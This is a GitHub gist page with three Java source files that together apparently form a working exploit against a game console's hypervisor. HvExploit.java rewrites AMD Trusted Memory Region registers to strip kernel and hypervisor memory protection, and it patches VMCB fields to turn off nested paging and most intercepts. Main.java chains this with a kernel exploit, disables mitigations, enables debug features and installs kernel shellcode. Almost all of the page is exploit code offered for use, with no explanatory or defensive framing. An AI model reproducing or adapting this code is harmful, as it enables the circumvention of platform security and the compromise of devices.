Skip to content

Instantly share code, notes, and snippets.

@flatz

flatz/HvExploit.java Secret

Last active May 3, 2026 17:48
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save flatz/620ddda6d64acca6d1c990dc3080ac0e to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save flatz/620ddda6d64acca6d1c990dc3080ac0e to your computer and use it in GitHub Desktop.
Download ZIP
Raw
HvExploit.java
package org.exploit;
import java.util.ArrayList;
import org.bootstrap.Log;
import org.exploit.structs.Cpuset;
import org.exploit.structs.TmrRegionConfig;
public class HvExploit {
public static final int D18F2_BUS = 0x0;
public static final int D18F2_SLOT = 0x18;
public static final int D18F2_FUNC = 0x2;
// D18F2x080: TMRIndexRegister: TMR Index Register
public static final long TMR_INDEX_REGISTER_ADDRESS;
// D18F2x084: TMRDataPortRegister: TMR Data Port Register
public static final long TMR_DATA_PORT_REGISTER_ADDRESS;
//-------------------------------------------------------------------------
private static final Api api = Api.getInstance();
static {
TMR_INDEX_REGISTER_ADDRESS = Helpers.getPCIConfigDmapAddress(D18F2_BUS, D18F2_SLOT, D18F2_FUNC, 0x80);
TMR_DATA_PORT_REGISTER_ADDRESS = Helpers.getPCIConfigDmapAddress(D18F2_BUS, D18F2_SLOT, D18F2_FUNC, 0x84);
}
private HvExploit() {
}
//-------------------------------------------------------------------------
public static TmrRegionConfig getTmrRegionConfig(int index) {
final int offset = index * 0x10;
final int baseAddressIndex = offset + 0x0; // TmrBaseAddr: Trusted Memory Region Base Address [47:16]
final int limitAddressIndex = offset + 0x4; // TmrLimitAddr: Trusted Memory Region Limit Address [47:16]
final int ctlIndex = offset + 0x8; // TmrCtl: Trusted Memory Region Control
final int fidIndex = offset + 0xC; // TmrFid: Trusted Memory Region FabridId & UnitId
final long addressMask = MathUtil.generateMask64(16, 63);
api.writeKernel32(TMR_INDEX_REGISTER_ADDRESS, baseAddressIndex);
final int baseTruncAddress = api.readKernel32(TMR_DATA_PORT_REGISTER_ADDRESS);
api.writeKernel32(TMR_INDEX_REGISTER_ADDRESS, limitAddressIndex);
final int limitTruncAddress = api.readKernel32(TMR_DATA_PORT_REGISTER_ADDRESS);
api.writeKernel32(TMR_INDEX_REGISTER_ADDRESS, ctlIndex);
final int ctl = api.readKernel32(TMR_DATA_PORT_REGISTER_ADDRESS);
api.writeKernel32(TMR_INDEX_REGISTER_ADDRESS, fidIndex);
final int fid = api.readKernel32(TMR_DATA_PORT_REGISTER_ADDRESS);
final long baseAddress = ((long)baseTruncAddress << 16) & addressMask;
final long limitAddress = ((long)limitTruncAddress << 16) & addressMask;
return new TmrRegionConfig(baseAddress, limitAddress, ctl, fid);
}
public static boolean setTmrRegionConfig(int index, TmrRegionConfig cfg) {
Checks.ensureNotNull(cfg);
final int offset = index * 0x10;
final int baseAddressIndex = offset + 0x0; // TmrBaseAddr: Trusted Memory Region Base Address [47:16]
final int limitAddressIndex = offset + 0x4; // TmrLimitAddr: Trusted Memory Region Limit Address [47:16]
final int ctlIndex = offset + 0x8; // TmrCtl: Trusted Memory Region Control
final int fidIndex = offset + 0xC; // TmrFid: Trusted Memory Region FabridId & UnitId
final long addressMask = MathUtil.generateMask64(16, 63);
final int baseTruncAddress = (int)((cfg.getBaseAddress() & addressMask) >>> 16);
final int limitTruncAddress = (int)((cfg.getLimitAddress() & addressMask) >>> 16);
api.writeKernel32(TMR_INDEX_REGISTER_ADDRESS, baseAddressIndex);
api.writeKernel32(TMR_DATA_PORT_REGISTER_ADDRESS, baseTruncAddress);
api.writeKernel32(TMR_INDEX_REGISTER_ADDRESS, limitAddressIndex);
api.writeKernel32(TMR_DATA_PORT_REGISTER_ADDRESS, limitTruncAddress);
api.writeKernel32(TMR_INDEX_REGISTER_ADDRESS, fidIndex);
api.writeKernel32(TMR_DATA_PORT_REGISTER_ADDRESS, cfg.getFid());
api.writeKernel32(TMR_INDEX_REGISTER_ADDRESS, ctlIndex);
api.writeKernel32(TMR_DATA_PORT_REGISTER_ADDRESS, cfg.getCtl());
return true;
}
//-------------------------------------------------------------------------
public static boolean disableKernelMemoryProtection() {
final long kernelTextBasePhysAddress = MemoryUtil.getPhysAddressFromKernelVirtualAddress(Globals.kernelTextBaseAddress);
if (kernelTextBasePhysAddress == 0L) {
Log.warn("Getting kernel text base physical address failed");
return false;
}
return disableMemoryProtectionInternal("kernel", kernelTextBasePhysAddress, Constants.PAGE_SIZE);
}
public static boolean disableHypervisorMemoryProtection() {
return disableMemoryProtectionInternal("hypervisor", Constants.HV_REGION_BASE, Constants.PAGE_SIZE);
}
public static boolean disableMemoryProtectionInternal(String name, long basePhysAddress, int size) {
Checks.ensureTrue(size > 0);
Log.debug("Base physical address of " + name +": " + TypeUtil.int64ToHex(basePhysAddress));
int index = -1;
final ArrayList<TmrRegionConfig> configs = new ArrayList<TmrRegionConfig>();
for (int i = Constants.MAX_TMR_REGIONS - 1; i >= 0; i--) {
final TmrRegionConfig cfg = getTmrRegionConfig(i);
if (cfg == null) {
Log.warn("Getting TMR cfg #" + i + " failed");
continue;
}
final int ctl = cfg.getCtl();
if (TypeUtil.compareUnsigned(basePhysAddress, cfg.getBaseAddress()) >= 0 && TypeUtil.compareUnsigned(basePhysAddress + size - 1, cfg.getLimitAddress()) <= 0) {
Log.debug("Found TMR of " + name + " with index: " + i);
configs.add(cfg);
index = i;
}
cfg.dump(i);
}
if (index == -1) {
Log.warn("TMR of " + name + " not found");
return false;
} else if (configs.size() > 1) {
Log.warn("Multiple TMR of " + name + " found");
return false;
}
final TmrRegionConfig cfg = configs.get(0);
if (cfg.getVal() == 0) {
Log.debug("TMR is not valid (already disabled?)");
return true;
}
Log.debug("Old TMR CTL: " + TypeUtil.int32ToHex(cfg.getCtl()));
Log.debug("Old TMR FID: " + TypeUtil.int32ToHex(cfg.getFid()));
cfg.setCtl(0); // Original value: 0x407
cfg.setFid(0); // Original value: 0x0
cfg.setVal(1); // Valid
cfg.setWE(1); // Write Enable
cfg.setCE(1); // Cacheable Access Enable
cfg.setSaeSMU(1); // Source Access Enabled for SMU
cfg.setSaePIE(1); // Source Access Enabled for PIE
cfg.setSaeCCM(1); // Source Access Enabled for CCM
cfg.setSaeGFX(1); // Source Access Enabled for GCM/GUS
cfg.setSaeNCM(1); // Source Access Enabled for NCM
cfg.setSaeIOM(1); // Source Access Enabled for IOM
Log.debug("New TMR CTL: " + TypeUtil.int32ToHex(cfg.getCtl()));
Log.debug("New TMR FID: " + TypeUtil.int32ToHex(cfg.getFid()));
//Log.debug("Setting new TMR config #" + index);
if (!setTmrRegionConfig(index, cfg)) {
Log.warn("Setting new TMR config #" + index + " failed");
return false;
}
return true;
}
public static boolean disableMemoryProtectionInternalOld(String name, long basePhysAddress, int size) {
Log.debug("Base physical address of " + name +": " + TypeUtil.int64ToHex(basePhysAddress));
int targetTmrIndex = -1;
int freeTmrIndex = -1;
final TmrRegionConfig[] configs = new TmrRegionConfig[Constants.MAX_TMR_REGIONS];
for (int i = configs.length - 1; i >= 0; i--) {
final TmrRegionConfig cfg = getTmrRegionConfig(i);
if (cfg == null) {
Log.warn("Getting TMR #" + i + " config failed");
continue;
}
final int ctl = cfg.getCtl();
if (cfg.getSaeCCM() == 1) {
if (TypeUtil.compareUnsigned(cfg.getBaseAddress(), basePhysAddress) <= 0 && TypeUtil.compareUnsigned(basePhysAddress + size, cfg.getLimitAddress()) < 0) {
targetTmrIndex = i;
}
} else {
if (freeTmrIndex == -1) {
freeTmrIndex = i;
}
}
configs[i] = cfg;
cfg.dump(i);
}
if (targetTmrIndex == -1) {
Log.warn("TMR of " + name + " not found");
return false;
}
Log.debug("Found TMR of " + name + " with index: " + targetTmrIndex);
if (configs[targetTmrIndex].getVal() == 0) {
Log.debug("Kernel TMR is not valid (already disabled?)");
return true;
}
TmrRegionConfig newConfig = configs[targetTmrIndex].clone();
Log.debug("Old TMR CTL: " + TypeUtil.int32ToHex(newConfig.getCtl()));
Log.debug("Old TMR FID: " + TypeUtil.int32ToHex(newConfig.getFid()));
newConfig.setCtl(0); // Original value: 0x407
newConfig.setFid(0); // Original value: 0x0
newConfig.setVal(1); // Valid
newConfig.setWE(1); // Write Enable
newConfig.setCE(1); // Cacheable Access Enable
newConfig.setSaeSMU(1); // Source Access Enabled for SMU
newConfig.setSaePIE(1); // Source Access Enabled for PIE
newConfig.setSaeCCM(1); // Source Access Enabled for CCM
newConfig.setSaeGFX(1); // Source Access Enabled for GCM/GUS
newConfig.setSaeNCM(1); // Source Access Enabled for NCM
newConfig.setSaeIOM(1); // Source Access Enabled for IOM
Log.debug("New TMR CTL: " + TypeUtil.int32ToHex(newConfig.getCtl()));
Log.debug("New TMR FID: " + TypeUtil.int32ToHex(newConfig.getFid()));
//Log.debug("Setting new TMR config #" + targetTmrIndex + " for kernel");
if (!setTmrRegionConfig(targetTmrIndex, newConfig)) {
Log.warn("Setting new TMR config #" + targetTmrIndex + " for kernel failed");
return false;
}
return true;
}
//-------------------------------------------------------------------------
public static long getVCPUVirtualAddress(int coreId) {
Checks.ensureTrue(coreId >= 0 && coreId < Constants.VM_MAXCPU);
Checks.ensureNotZero(Offsets.addressOf_kernel__hv_vm_area_start);
return Offsets.addressOf_kernel__hv_vm_area_start + Constants.VM_MAXCPU * Offsets.sizeOf_vcpu + 0x8 + coreId * Offsets.sizeOf_vcpu;
}
public static long[] getVMCBAddresses(int coreId) {
final long vcpuVirtAddress = getVCPUVirtualAddress(coreId);
Log.debug("VCPU virtual address: " + TypeUtil.int64ToHex(vcpuVirtAddress));
final long vcpuPhysAddress = MemoryUtil.getPhysAddressFromKernelVirtualAddress(vcpuVirtAddress);
if (vcpuPhysAddress == 0L) {
Log.warn("Getting VCPU physical address failed");
return null;
}
Log.debug("VCPU physical address: " + TypeUtil.int64ToHex(vcpuPhysAddress));
final long vmcbVirtAddress = api.readPhysical64(vcpuPhysAddress + Offsets.offsetOf_vcpu_vmcb_va);
if (vmcbVirtAddress == 0L || vmcbVirtAddress == -1L) {
Log.warn("Bad VMCB virtual address " + TypeUtil.int64ToHex(vmcbVirtAddress) + " (hypervisor issue?)");
return null;
}
Log.debug("VMCB virtual address: " + TypeUtil.int64ToHex(vmcbVirtAddress));
final long vmcbPhysAddress = MemoryUtil.getPhysAddressFromKernelVirtualAddress(vmcbVirtAddress);
if (vmcbPhysAddress == 0L) {
Log.warn("Getting VMCB physical address failed");
return null;
}
Log.debug("VMCB physical address: " + TypeUtil.int64ToHex(vmcbPhysAddress));
return new long[] { vmcbVirtAddress, vmcbPhysAddress };
}
//-------------------------------------------------------------------------
public static boolean disarmEmbeddedHypervisorForSpecificCore(int coreId) {
final long[] vmcbAddresses = getVMCBAddresses(coreId);
if (vmcbAddresses == null) {
Log.warn("Getting VMCB address failed");
return false;
}
final long vmcbVirtAddress = vmcbAddresses[0];
final long vmcbPhysAddress = vmcbAddresses[1];
int value32;
long value64;
// Read old VMCB.
final MemoryBuffer buffer = api.readPhysicalBuffer(vmcbPhysAddress + Offsets.offsetOf_vmcb_ctrl, Offsets.sizeOf_vmcb_ctrl);
// Disable GMET and NP in NP CTRL.
value64 = buffer.read64(Offsets.offsetOf_vmcb_ctrl_np_ctrl); // 0x9
Log.debug("Old NP ctrl: " + TypeUtil.int64ToHex(value64));
value64 = MathUtil.updateBits64(value64, 0, 0, 0 + 1 - 1); // NP enable = 0
value64 = MathUtil.updateBits64(value64, 0, 3, 3 + 1 - 1); // GMET enable = 0
Log.debug("New NP ctrl: " + TypeUtil.int64ToHex(value64));
buffer.write64(Offsets.offsetOf_vmcb_ctrl_np_ctrl, value64); // 0x0
// Disable interception of CRx writes.
value32 = buffer.read32(Offsets.offsetOf_vmcb_ctrl_cr_intercepts); // 0x100000
Log.debug("Old CR intercepts: " + TypeUtil.int32ToHex(value32));
value32 = 0;
Log.debug("New CR intercepts: " + TypeUtil.int32ToHex(value32));
buffer.write32(Offsets.offsetOf_vmcb_ctrl_cr_intercepts, value32); // 0x0
// Disable general #1 interceptions.
value32 = buffer.read32(Offsets.offsetOf_vmcb_ctrl_general1_intercepts); // 0x10400020
Log.debug("Old general #1 intercepts: " + TypeUtil.int32ToHex(value32));
value32 = MathUtil.clearField32(value32, ~(1 << 18)); // Keep interception of CPUID instruction
Log.debug("New general #1 intercepts: " + TypeUtil.int32ToHex(value32));
buffer.write32(Offsets.offsetOf_vmcb_ctrl_general1_intercepts, value32); // 0x0
// Disable general #2 interceptions.
value32 = buffer.read32(Offsets.offsetOf_vmcb_ctrl_general2_intercepts); // 0x407F
Log.debug("Old general #2 intercepts: " + TypeUtil.int32ToHex(value32));
value32 = MathUtil.clearField32(value32, ~( // Keep interception of some instructions
(1 << 0) | // VMRUN
(1 << 1) | // VMMCALL
(1 << 2) | // VMLOAD
(1 << 3) // VMSAVE
));
Log.debug("New general #2 intercepts: " + TypeUtil.int32ToHex(value32));
buffer.write32(Offsets.offsetOf_vmcb_ctrl_general2_intercepts, value32); // 0xF
// Write new VMCB.
api.writePhysicalBuffer(vmcbPhysAddress + Offsets.offsetOf_vmcb_ctrl, buffer);
return true;
}
public static boolean disarmExternalHypervisor() {
// TODO: Need to implement.
return true;
}
public static boolean disarmEmbeddedHypervisor() {
final int coreId = ThreadUtil.getCurrentCpuCoreId();
if (coreId == -1) {
Log.warn("Getting CPU core ID failed");
return false;
}
Log.debug("Current core id: " + coreId);
final Cpuset initialCpuAffinity = ThreadUtil.getCurrentThreadCpuAffinity();
if (initialCpuAffinity == null) {
Log.warn("Getting CPU affinity mask failed");
return false;
}
final Cpuset newCpuAffinity = new Cpuset(coreId);
if (!ThreadUtil.setCurrentThreadCpuAffinity(newCpuAffinity)) {
Log.warn("Pinning main thread to core #" + coreId + " failed");
return false;
}
boolean status = true;
for (int i = 0; i < Constants.VM_MAXCPU; i++) {
Log.debug("Disarming hypervisor for core #" + i);
if (!disarmEmbeddedHypervisorForSpecificCore(i)) {
Log.warn("Disarming hypervisor for core #" + i + " failed");
status = false;
}
}
if (!ThreadUtil.setCurrentThreadCpuAffinity(initialCpuAffinity)) {
Log.warn("Unpinning main thread from core #" + coreId + " failed");
return false;
}
return status;
}
}
Raw
Main.java
package org.exploit;
import org.bootstrap.Config;
import org.bootstrap.Log;
import org.bootstrap.LogHandler;
import org.bootstrap.Screen;
import org.bootstrap.ScreenLogHandler;
public class Main {
// XXX: Keep in mind that meta debugger does buffering, thus messages does not pop up immediately.
private static final boolean toggleMDBGLogging = false;
private static final boolean toggleTCPLogging = true;
private static final boolean toggleKernelExploit = true;
//-------------------------------------------------------------------------
private static Api api;
private static LogHandler logHandler;
//-------------------------------------------------------------------------
public static void main(String args[]) {
api = Api.makeInstance();
setupLog();
Log.info("Hello, world!");
if (toggleKernelExploit) {
final boolean hasKernelPreloader = api.hasKernelPreloader();
int oldVerbosityLevel = -1;
if (logHandler != null) {
// Temporarily disable debug messages, otherwise exploitation may take longer or crash system.
oldVerbosityLevel = logHandler.setVerbosityLevel(Log.INFO);
}
Log.info("Setting up kernel exploit");
final boolean isKernelExploited = api.setupKernelExploit();
if (!isKernelExploited) {
Log.warn("Setting up kernel exploit failed");
}
if (logHandler != null) {
logHandler.setVerbosityLevel(oldVerbosityLevel);
}
final int truncatedSdkVersion = api.getTruncatedSdkVersion();
if (isKernelExploited) {
if (!GpuMemoryUtil.prepareGpuScratchBuffers()) {
throw Log.error("Preparing GPU scratch buffers failed");
}
Log.info("Enabling UART");
KernelHelper.enableUART();
Log.info("Enabling console output");
KernelHelper.enableConsoleOutput();
// Make kernel's `printf`s to be visible via DECI5/UART.
Log.info("Enabling system-level debugger");
SystemUtil.enableSystemLevelDebugger();
ProcessUtil.setCapabilitiesForCurrentProcess(new String[] { "system" });
if (SystemUtil.isCex()) {
Log.info("Enabling debug settings");
SystemUtil.setQAFlags(new String[] { "debug menu", "debug menu mini" });
SystemUtil.setUTokenFlags(new String[] { "store mode" });
}
Log.info("Disabling mitigations");
if (!KernelHelper.disableMitigations()) {
Log.warn("Disabling mitigations failed");
}
boolean hvExploited = false;
// TMR based HV exploit is patched on 5.00.
if (truncatedSdkVersion < 0x0500) {
Log.info("Disabling kernel memory protection");
if (HvExploit.disableKernelMemoryProtection()) {
// HV has its own memory region on 3.00+.
if (truncatedSdkVersion >= 0x0300) {
Log.info("Disabling hypervisor memory protection");
if (HvExploit.disableHypervisorMemoryProtection()) {
Log.info("Disarming external hypervisor");
if (HvExploit.disarmExternalHypervisor()) {
hvExploited = true;
} else {
Log.warn("Disarming external hypervisor failed");
}
} else {
Log.warn("Disabling hypervisor memory protection failed");
}
} else {
Log.info("Disarming embedded hypervisor");
if (HvExploit.disarmEmbeddedHypervisor()) {
hvExploited = true;
} else {
Log.warn("Disarming embedded hypervisor failed");
}
}
} else {
Log.warn("Disabling kernel memory protection failed");
}
}
if (hvExploited) {
SystemUtil.sendNotification("Hypervisor exploitation succeeded!");
} else {
SystemUtil.sendNotification("Hypervisor exploitation failed!");
}
// TODO: Kernel shellcode does not support 3.00+ firmwares yet.
if (truncatedSdkVersion < 0x0300) {
if (hvExploited && !hasKernelPreloader) {
Log.info("Installing kernel preloader");
if (api.installKernelPreloader("preloader.bin")) {
SystemUtil.sendNotification("Kernel shellcode installation succeeded!");
} else {
SystemUtil.sendNotification("Kernel shellcode installation failed!");
Log.warn("Installing kernel preloader failed");
}
}
} else {
SystemUtil.sendNotification("Kernel shellcode installation is not possible!");
Log.warn("Skipping HV exploitation due to unsupported SDK version");
}
}
}
Log.info("Goodbye!");
}
private static void setupLog() {
final LogHandler screenLogHandler = Log.getHandler(ScreenLogHandler.class.getName());
if (screenLogHandler != null) {
// Show only fatal messages on screen.
screenLogHandler.setVerbosityLevel(Log.ERROR);
}
final String className;
if (toggleMDBGLogging) {
className = LogHandlerMDBG.class.getName();
if (!Log.hasHandler(className)) {
logHandler = new LogHandlerMDBG();
Log.addHandler(logHandler);
} else {
logHandler = Log.getHandler(className);
}
} else {
final String debugLogHost = Config.getDebugLogServerHost();
final int debugLogPort = Config.getDebugLogServerPort();
Log.info("Using debug logging on " + debugLogHost + ":" + debugLogPort);
if (toggleTCPLogging) {
className = LogHandlerTCP.class.getName();
if (!Log.hasHandler(className)) {
logHandler = new LogHandlerTCP(debugLogHost, debugLogPort);
Log.addHandler(logHandler);
} else {
logHandler = Log.getHandler(className);
}
} else {
className = LogHandlerUDP.class.getName();
if (!Log.hasHandler(className)) {
logHandler = new LogHandlerUDP(debugLogHost, debugLogPort);
Log.addHandler(logHandler);
} else {
logHandler = Log.getHandler(className);
}
}
}
if (logHandler != null) {
logHandler.setVerbosityLevel(Log.DEBUG);
}
}
}
Raw
TmrRegionConfig.java
package org.exploit.structs;
import org.bootstrap.Log;
import org.exploit.Api;
import org.exploit.Checks;
import org.exploit.MathUtil;
import org.exploit.Offsets;
import org.exploit.TypeUtil;
public class TmrRegionConfig implements Cloneable {
private long baseAddress;
private long limitAddress;
private int ctl;
private int fid;
public TmrRegionConfig() {
}
public TmrRegionConfig(long baseAddress, long limitAddress, int ctl, int fid) {
setBaseAddress(baseAddress);
setLimitAddress(limitAddress);
setCtl(ctl);
setFid(fid);
}
public void dump(int index) {
Log.info("TMR[" + index + "] = { BaseAddr = " + TypeUtil.int64ToHex(baseAddress) + ", LimitAddr = " + TypeUtil.int64ToHex(limitAddress) + ", Ctl = " + TypeUtil.int32ToHex(ctl) + ", Fid = " + TypeUtil.int32ToHex(fid) + " }");
}
public long getBaseAddress() { // TmrBaseAddr
return baseAddress;
}
public TmrRegionConfig setBaseAddress(long baseAddress) { // TmrBaseAddr
this.baseAddress = baseAddress;
return this;
}
public long getLimitAddress() { // TmrLimitAddr
return limitAddress;
}
public TmrRegionConfig setLimitAddress(long limitAddress) { // TmrLimitAddr
this.limitAddress = limitAddress;
return this;
}
public int getCtl() { // TmrCtl
return ctl;
}
public TmrRegionConfig setCtl(int ctl) { // TmrCtl
this.ctl = ctl;
return this;
}
public int getSecLvl() { // TmrSecLvl
return MathUtil.getBits32(this.ctl, 15, 15 + 3 - 1);
}
public TmrRegionConfig setSecLvl(int value) { // TmrSecLvl
this.ctl = MathUtil.updateBits32(this.ctl, value, 15, 15 + 3 - 1);
return this;
}
public int getSecLvlVal() { // TmrSecLvlVal
return MathUtil.getBits32(this.ctl, 14, 14 + 1 - 1);
}
public TmrRegionConfig setSecLvlVal(int value) { // TmrSecLvlVal
this.ctl = MathUtil.updateBits32(this.ctl, value, 14, 14 + 1 - 1);
return this;
}
public int getSaeIOM() { // TmrSaeIOM
return MathUtil.getBits32(this.ctl, 13, 13 + 1 - 1);
}
public TmrRegionConfig setSaeIOM(int value) { // TmrSaeIOM
this.ctl = MathUtil.updateBits32(this.ctl, value, 13, 13 + 1 - 1);
return this;
}
public int getSaeNCM() { // TmrSaeNCM
return MathUtil.getBits32(this.ctl, 12, 12 + 1 - 1);
}
public TmrRegionConfig setSaeNCM(int value) { // TmrSaeNCM
this.ctl = MathUtil.updateBits32(this.ctl, value, 12, 12 + 1 - 1);
return this;
}
public int getSaeGFX() { // TmrSaeGFX
return MathUtil.getBits32(this.ctl, 11, 11 + 1 - 1);
}
public TmrRegionConfig setSaeGFX(int value) { // TmrSaeGFX
this.ctl = MathUtil.updateBits32(this.ctl, value, 11, 11 + 1 - 1);
return this;
}
public int getSaeCCM() { // TmrSaeCCM
return MathUtil.getBits32(this.ctl, 10, 10 + 1 - 1);
}
public TmrRegionConfig setSaeCCM(int value) { // TmrSaeCCM
this.ctl = MathUtil.updateBits32(this.ctl, value, 10, 10 + 1 - 1);
return this;
}
public int getSaePIE() { // TmrSaePIE
return MathUtil.getBits32(this.ctl, 9, 9 + 1 - 1);
}
public TmrRegionConfig setSaePIE(int value) { // TmrSaePIE
this.ctl = MathUtil.updateBits32(this.ctl, value, 9, 9 + 1 - 1);
return this;
}
public int getSaeSMU() { // TmrSaeSMU
return MathUtil.getBits32(this.ctl, 8, 8 + 1 - 1);
}
public TmrRegionConfig setSaeSMU(int value) { // TmrSaeSMU
this.ctl = MathUtil.updateBits32(this.ctl, value, 8, 8 + 1 - 1);
return this;
}
public int getUnitIdVal1() { // TmrUnitIdVal1
return MathUtil.getBits32(this.ctl, 7, 7 + 1 - 1);
}
public TmrRegionConfig setUnitIdVal1(int value) { // TmrUnitIdVal1
this.ctl = MathUtil.updateBits32(this.ctl, value, 7, 7 + 1 - 1);
return this;
}
public int getFabricIdVal1() { // TmrFabricIdVal1
return MathUtil.getBits32(this.ctl, 6, 6 + 1 - 1);
}
public TmrRegionConfig setFabricIdVal1(int value) { // TmrFabricIdVal1
this.ctl = MathUtil.updateBits32(this.ctl, value, 6, 6 + 1 - 1);
return this;
}
public int getUnitIdVal0() { // TmrUnitIdVal0
return MathUtil.getBits32(this.ctl, 5, 5 + 1 - 1);
}
public TmrRegionConfig setUnitIdVal0(int value) { // TmrUnitIdVal0
this.ctl = MathUtil.updateBits32(this.ctl, value, 5, 5 + 1 - 1);
return this;
}
public int getFabricIdVal0() { // TmrFabricIdVal0
return MathUtil.getBits32(this.ctl, 4, 4 + 1 - 1);
}
public TmrRegionConfig setFabricIdVal0(int value) { // TmrFabricIdVal0
this.ctl = MathUtil.updateBits32(this.ctl, value, 4, 4 + 1 - 1);
return this;
}
public int getCE() { // TmrCE
return MathUtil.getBits32(this.ctl, 2, 2 + 1 - 1);
}
public TmrRegionConfig setCE(int value) { // TmrCE
this.ctl = MathUtil.updateBits32(this.ctl, value, 2, 2 + 1 - 1);
return this;
}
public int getWE() { // TmrWE
return MathUtil.getBits32(this.ctl, 1, 1 + 1 - 1);
}
public TmrRegionConfig setWE(int value) { // TmrWE
this.ctl = MathUtil.updateBits32(this.ctl, value, 1, 1 + 1 - 1);
return this;
}
public int getVal() { // TmrVal
return MathUtil.getBits32(this.ctl, 0, 0 + 1 - 1);
}
public TmrRegionConfig setVal(int value) { // TmrVal
this.ctl = MathUtil.updateBits32(this.ctl, value, 0, 0 + 1 - 1);
return this;
}
public int getFid() { // TmrFid
return fid;
}
public TmrRegionConfig setFid(int fid) { // TmrFid
this.fid = fid;
return this;
}
public int getUnitId1() { // TmrUnitId1
return MathUtil.getBits32(this.fid, 26, 26 + 6 - 1);
}
public TmrRegionConfig setUnitId1(int value) { // TmrUnitId1
this.fid = MathUtil.updateBits32(this.fid, value, 26, 26 + 6 - 1);
return this;
}
public int getFabricId1() { // TmrFabricId1
return MathUtil.getBits32(this.fid, 16, 16 + 10 - 1);
}
public TmrRegionConfig setFabricId1(int value) { // TmrFabricId1
this.fid = MathUtil.updateBits32(this.fid, value, 16, 16 + 10 - 1);
return this;
}
public int getUnitId0() { // TmrUnitId0
return MathUtil.getBits32(this.fid, 10, 10 + 6 - 1);
}
public TmrRegionConfig setUnitId0(int value) { // TmrUnitId0
this.fid = MathUtil.updateBits32(this.fid, value, 10, 10 + 6 - 1);
return this;
}
public int getFabricId0() { // TmrFabricId0
return MathUtil.getBits32(this.fid, 0, 0 + 10 - 1);
}
public TmrRegionConfig setFabricId0(int value) { // TmrFabricId0
this.fid = MathUtil.updateBits32(this.fid, value, 0, 0 + 10 - 1);
return this;
}
public TmrRegionConfig clone() {
try {
return (TmrRegionConfig)super.clone();
} catch (CloneNotSupportedException e) {
return null;
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment